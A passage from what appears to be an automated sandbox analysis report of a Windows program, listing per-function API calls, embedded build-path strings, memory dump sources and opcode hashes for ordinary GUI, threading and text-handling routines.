                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Process$CriticalCurrentMenuSectionTerminateValue$DecrementEnterErrorException@8InfoInterlockedItemLastLeaveThrow
                                                                                                • String ID: ::GetMenuItemInfo(handle, item, byPos, &menuItemInfo) != 0$@fO$AWL::CMenu::GetMenuItemInfoW$d:\build\teamagent\_work\1\s\0\awl\inc\menuawl.h$B
                                                                                                • API String ID: 547705551-4278248787
                                                                                                • Opcode ID: 32f11b1b8e81b3f5a97ab15276b313e664d6c8f5d99cfe8f607499e02a062c38
                                                                                                • Instruction ID: 20e7501e8185c3a190532282122b37b288096be1640be6f341436a8d654c693a
                                                                                                • Opcode Fuzzy Hash: 32f11b1b8e81b3f5a97ab15276b313e664d6c8f5d99cfe8f607499e02a062c38
                                                                                                • Instruction Fuzzy Hash: 4001D631750214A7EB301B24AC07B7B3669A752715F80457BFD14D52D1FBEA8C248659
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0041E3FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlocked
                                                                                                • String ID: ..\Shared\shared.cpp$@fO$Auto$Black & white$Color$Default$Gray
                                                                                                • API String ID: 3508698243-208806811
                                                                                                • Opcode ID: 4c865f4517ff123b2774811f1e2fdc35c517fd8ce6dd7f9cce63e92983b9b8dc
                                                                                                • Instruction ID: 81be69f1e93fa2a90888e8dff254d769e47bce9b2b39e707595c4b98d3166e7b
                                                                                                • Opcode Fuzzy Hash: 4c865f4517ff123b2774811f1e2fdc35c517fd8ce6dd7f9cce63e92983b9b8dc
                                                                                                • Instruction Fuzzy Hash: D71182B4684308E6D360AFA59E17BE97664A704B54F20462FFA02662C2DBFD140146AF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004A127B
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004A128C
                                                                                                • InterlockedIncrement.KERNEL32( WS), ref: 004A12B1
                                                                                                • InterlockedDecrement.KERNEL32( WS), ref: 004A12BE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Increment$Decrement
                                                                                                • String ID: WS$ WS$ WS$xMS
                                                                                                • API String ID: 4289621856-982671530
                                                                                                • Opcode ID: b236a9b5bcd228cb6592974274aded0f293f094238d4bafc086013a70755b5b7
                                                                                                • Instruction ID: e0a472d3c7aeee1e481b4bec9d9fcc287aa550e6be4aae3be6502adeacba85bd
                                                                                                • Opcode Fuzzy Hash: b236a9b5bcd228cb6592974274aded0f293f094238d4bafc086013a70755b5b7
                                                                                                • Instruction Fuzzy Hash: 0E114C71901A48EFCB00CF98D844B5A7FF8FB193A0F40555AF810D7351E3B5A904DBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00491721,00000000,00491A10,00000000), ref: 0047423C
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00474243
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00474261
                                                                                                • GetLastError.KERNEL32 ref: 0047426E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                • String ID: @fO$IsWow64Process$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp$kernel32
                                                                                                • API String ID: 896058289-242951907
                                                                                                • Opcode ID: 673b5a4983553684353e50ed9c12926858c6d401ccb6e31dfb7e1c0779ab1b44
                                                                                                • Instruction ID: 8e4f9e2c311685d680928e8a0b164ba4f09dd847b364e59270f42ca528e11747
                                                                                                • Opcode Fuzzy Hash: 673b5a4983553684353e50ed9c12926858c6d401ccb6e31dfb7e1c0779ab1b44
                                                                                                • Instruction Fuzzy Hash: 8DF089B15413206BE71027F49D0EABF3A98FBC4752F15847AF909D7181E7788C10975A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32 ref: 00498301
                                                                                                • LeaveCriticalSection.KERNEL32(00535528,?), ref: 00498328
                                                                                                • EnterCriticalSection.KERNEL32(00535528), ref: 0049836D
                                                                                                • LeaveCriticalSection.KERNEL32(00535528,00000000), ref: 00498392
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Value$Exception@8Throw
                                                                                                • String ID: (US$@fO$@fO$@fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\inc\threadlanguageswitcherfn.h
                                                                                                • API String ID: 3642411323-4048189412
                                                                                                • Opcode ID: 5b52477d6ba5c662a282c040f08a1a8957320b949cafbac562b8db2fd93c39f9
                                                                                                • Instruction ID: a7e978b9d4ff37698c1778cb14cd245eca87d15acd1817d7dab2800739741311
                                                                                                • Opcode Fuzzy Hash: 5b52477d6ba5c662a282c040f08a1a8957320b949cafbac562b8db2fd93c39f9
                                                                                                • Instruction Fuzzy Hash: E3213C30940754ABDB606BAC9C06B6E7FA0BB15725F10075EF934B73C1D7F85900879A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID: ;L$;L$;L
                                                                                                • API String ID: 1036877536-644071789
                                                                                                • Opcode ID: a71f6d019c213027ac1bde58113d556f5e300bfb1f9d378a626322cd8e63687a
                                                                                                • Instruction ID: ba2e68a3bb6ce3cb57d9b7e2c78519c14c4f51b73d27d00e1e9a2a57d66336ca
                                                                                                • Opcode Fuzzy Hash: a71f6d019c213027ac1bde58113d556f5e300bfb1f9d378a626322cd8e63687a
                                                                                                • Instruction Fuzzy Hash: 32A1483A9003869FD715CE58C8E1BBEBBA5EF55314F1881AFD8899B341C63C8941C75D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32(74E070F0,000000FF,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1B2
                                                                                                • TlsSetValue.KERNEL32(0053011C,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1D0
                                                                                                  • Part of subcall function 0046CB80: TlsGetValue.KERNEL32(0053011C,00000008,?,000000FF,?,0042325B,?,00427A2A), ref: 0046CBAB
                                                                                                  • Part of subcall function 0046CB80: TlsSetValue.KERNEL32(0053011C,?,0042325B,?,00427A2A), ref: 0046CBCC
                                                                                                  • Part of subcall function 0046CB80: GetErrorInfo.OLEAUT32(00000000,[2B), ref: 0046CC2A
                                                                                                  • Part of subcall function 0046CB80: __CxxThrowException@8.LIBVCRUNTIME ref: 0046CC9B
                                                                                                  • Part of subcall function 0046CB80: InterlockedDecrement.KERNEL32(?), ref: 0046CCC4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$DecrementErrorException@8InfoInterlockedThrow
                                                                                                • String ID: pNS
                                                                                                • API String ID: 951278994-925422471
                                                                                                • Opcode ID: 83be73e1849e721d9bc2c84f570e58f7fad513806ab70e593799d594a687c7d8
                                                                                                • Instruction ID: ad414fa5a46150409f155a8436277413183a3e712351ab4cc5e7f5f352325042
                                                                                                • Opcode Fuzzy Hash: 83be73e1849e721d9bc2c84f570e58f7fad513806ab70e593799d594a687c7d8
                                                                                                • Instruction Fuzzy Hash: CF41F470904348EBDB04ABB5881A7BE7FE4BB45704F50416EE9119B3E2DBBD4904C759
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(00000009), ref: 0049D400
                                                                                                • InterlockedDecrement.KERNEL32(00000009), ref: 0049D45B
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0049D4C0
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\finenetserverimpl.cpp, xrefs: 0049D3A6, 0049D4F5
                                                                                                • @fO, xrefs: 0049D3B0
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h, xrefs: 0049D4B6
                                                                                                • @fO, xrefs: 0049D4FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalDecrementInterlockedSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$@fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\finenetserverimpl.cpp$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h
                                                                                                • API String ID: 2345687290-493409244
                                                                                                • Opcode ID: dfd97013f857169b430feaf6c62d705ad7959e4f7e06c01e5ae34f4cc9060021
                                                                                                • Instruction ID: 8beadb7b05855c0f88527d96c6f516189abe1b2892901de5b3b88f731acb8d5e
                                                                                                • Opcode Fuzzy Hash: dfd97013f857169b430feaf6c62d705ad7959e4f7e06c01e5ae34f4cc9060021
                                                                                                • Instruction Fuzzy Hash: B451F231A00214AFDB10DF58C945BABBBB0BF44704F14817EE849AB3C2D7B9AD00CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 00439107
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00439119
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0043913F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\awlglobals.cpp$xMS$xMS
                                                                                                • API String ID: 2574743344-2985608832
                                                                                                • Opcode ID: 114130a8e37ef3df4066cc2e2872244ff3878942fff8d447639cf6b52fa0c772
                                                                                                • Instruction ID: 20e2398553408209511da5f3cdb35832c94d0bfa7fa1f595029b9ce191f6a038
                                                                                                • Opcode Fuzzy Hash: 114130a8e37ef3df4066cc2e2872244ff3878942fff8d447639cf6b52fa0c772
                                                                                                • Instruction Fuzzy Hash: F641D332A006159FCB10DFA8CC81BAEB7B8FB49720F15466AEC14E7380D779AD008B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateMenu.USER32 ref: 0045B1C0
                                                                                                • CreatePen.GDI32(00000000,00000000,00000000), ref: 0045B245
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CreateCriticalSectionValue$EnterException@8LeaveMenuThrow
                                                                                                • String ID: @fO$@fO$`KS$d:\build\teamagent\_work\1\s\0\awl\src\messageboxreserveawl.cpp$lKS
                                                                                                • API String ID: 2315570023-1479007846
                                                                                                • Opcode ID: 65678eee72a870a62b1980625efa165fc588bf1e3d993c5d2e9e7cbc4855dceb
                                                                                                • Instruction ID: 2da6738b424db4189eb127e793fae0c0801db9752833a3ca0fc243cae791f0d3
                                                                                                • Opcode Fuzzy Hash: 65678eee72a870a62b1980625efa165fc588bf1e3d993c5d2e9e7cbc4855dceb
                                                                                                • Instruction Fuzzy Hash: 9C41E175B002049BCB14CF68ECA5B6ABBB5FB88700F11422EE941D73D1D778E908CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32 ref: 0041F3CB
                                                                                                • InterlockedIncrement.KERNEL32(FFFFFFF7), ref: 0041F420
                                                                                                • TlsGetValue.KERNEL32 ref: 0041F433
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041F4A4
                                                                                                • InterlockedDecrement.KERNEL32(FFFFFFFF), ref: 0041F4DD
                                                                                                  • Part of subcall function 0046C190: TlsGetValue.KERNEL32(74E070F0,000000FF,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1B2
                                                                                                  • Part of subcall function 0046C190: TlsSetValue.KERNEL32(0053011C,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$Interlocked$Decrement$Increment
                                                                                                • String ID: scanwia.txt$xMS
                                                                                                • API String ID: 2259043009-1313088856
                                                                                                • Opcode ID: ace7f7919b34af25caa376b9a81971786ee60c9efbd1e4f48741ed6f48a4497e
                                                                                                • Instruction ID: 3aa7f7db2244015bfa749e1952391ebc5ad40edabb9a3ab1aa1a79089a5474f6
                                                                                                • Opcode Fuzzy Hash: ace7f7919b34af25caa376b9a81971786ee60c9efbd1e4f48741ed6f48a4497e
                                                                                                • Instruction Fuzzy Hash: F0418B71A00204AFDB20DF69CD45BAEBBF4EF44710F104229E815A7392D7799E04CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0048F49E
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048F53A
                                                                                                • LeaveCriticalSection.KERNEL32 ref: 0048F5AF
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$DecrementException@8InterlockedThrow
                                                                                                • String ID: *.*$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp$xMS
                                                                                                • API String ID: 312464716-3992537909
                                                                                                • Opcode ID: 91db52d4df69ae8eaab5da2a4ab5f99f2595f969022d3a0b38cab01e64585422
                                                                                                • Instruction ID: ba3ea0b1f54a31e660a014a92a36108735a3977c605c907cb6aeaaeea0c05595
                                                                                                • Opcode Fuzzy Hash: 91db52d4df69ae8eaab5da2a4ab5f99f2595f969022d3a0b38cab01e64585422
                                                                                                • Instruction Fuzzy Hash: 1141D470900249EFDB00EF99C945BAEBBB4EF54314F14815EE905673C2DBB99E04CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • IsWindow.USER32(00000001), ref: 0043F113
                                                                                                • EnableWindow.USER32(00000001,00000000), ref: 0043F144
                                                                                                  • Part of subcall function 00433F50: IsWindow.USER32(00000001), ref: 00433F62
                                                                                                  • Part of subcall function 00433F50: GetScrollInfo.USER32 ref: 00434011
                                                                                                  • Part of subcall function 00433F50: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,0043EED7,?,?,00000000,00000009), ref: 0043401B
                                                                                                  • Part of subcall function 00433E60: IsWindow.USER32(00000001), ref: 00433E72
                                                                                                  • Part of subcall function 00433E60: SetScrollInfo.USER32(00000001,?,?,?), ref: 00433F40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$CriticalInfoScrollSectionValue$EnableEnterErrorException@8LastLeaveThrow
                                                                                                • String ID: @fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$d:\build\teamagent\_work\1\s\0\awl\src\scrollingawl.cpp
                                                                                                • API String ID: 3708692718-859932762
                                                                                                • Opcode ID: f4e0719902e1d4e7355b4ed8b6751fda707adfcf77a60687e043142962010e70
                                                                                                • Instruction ID: 1e1240d5ea88bdd9ef7a603854857a3c97d50b80afe872bbaa683acb58143721
                                                                                                • Opcode Fuzzy Hash: f4e0719902e1d4e7355b4ed8b6751fda707adfcf77a60687e043142962010e70
                                                                                                • Instruction Fuzzy Hash: B031CB71B40310A7EB24AA15D947F3B76A4AB98B04F00543FFA45D72C2E7ADDC18869A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetTextMetricsW.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00465611), ref: 004653E5
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00465611,?,?,?,?), ref: 004653EF
                                                                                                • GetTextAlign.GDI32(?), ref: 00465439
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Text$AlignErrorLastMetrics
                                                                                                • String ID: ::GetTextMetrics( dc, &metric )$@fO$AWL::calculateTextRect$d:\build\teamagent\_work\1\s\0\awl\src\alphachannelawl.cpp
                                                                                                • API String ID: 1818421611-1428707535
                                                                                                • Opcode ID: 228fd8fb34983bf3d00a029b69955a70d76c7ff10a385e9d9142932ff550219c
                                                                                                • Instruction ID: 035f6a3180374277dead8f9e1bb9e10bf635b15b24ef923255b08000c66adfb4
                                                                                                • Opcode Fuzzy Hash: 228fd8fb34983bf3d00a029b69955a70d76c7ff10a385e9d9142932ff550219c
                                                                                                • Instruction Fuzzy Hash: EC31CF71200A059BD7149F29CC46B6BB7A5EB80301F50856AE859C73A2FF78E851CBCA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00466A50: InterlockedDecrement.KERNEL32(00000128), ref: 00466AE3
                                                                                                  • Part of subcall function 00466A50: InterlockedDecrement.KERNEL32(00000000), ref: 00466B06
                                                                                                  • Part of subcall function 00466A50: IsWindow.USER32(?), ref: 00466B2A
                                                                                                  • Part of subcall function 00466A50: SendMessageW.USER32(?,0000041E,00000014,00000000), ref: 00466B60
                                                                                                • IsWindow.USER32(?), ref: 004680AF
                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000000), ref: 004680E1
                                                                                                • IsWindow.USER32(?), ref: 004680F7
                                                                                                • SendMessageW.USER32(?,00000438,00000000,00000000), ref: 00468128
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$DecrementInterlocked
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 2987371981-3237162522
                                                                                                • Opcode ID: 8cb80863d6f541f5b6760af17be6a1ddcc4b1c03b77a6b9397dcf43123d07444
                                                                                                • Instruction ID: 87ef8dbab497590e16b68f57f8eb13f0a27f6666e70c5b597941ff460125ca5a
                                                                                                • Opcode Fuzzy Hash: 8cb80863d6f541f5b6760af17be6a1ddcc4b1c03b77a6b9397dcf43123d07444
                                                                                                • Instruction Fuzzy Hash: 632107313402016BEB106F288D46F773BA4AF80744F05817EFD08EB2D2EA79DC15C6A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0043E443
                                                                                                • IsWindow.USER32(?), ref: 0043E497
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0043E4C3
                                                                                                • SetWindowLongW.USER32 ref: 0043E4D2
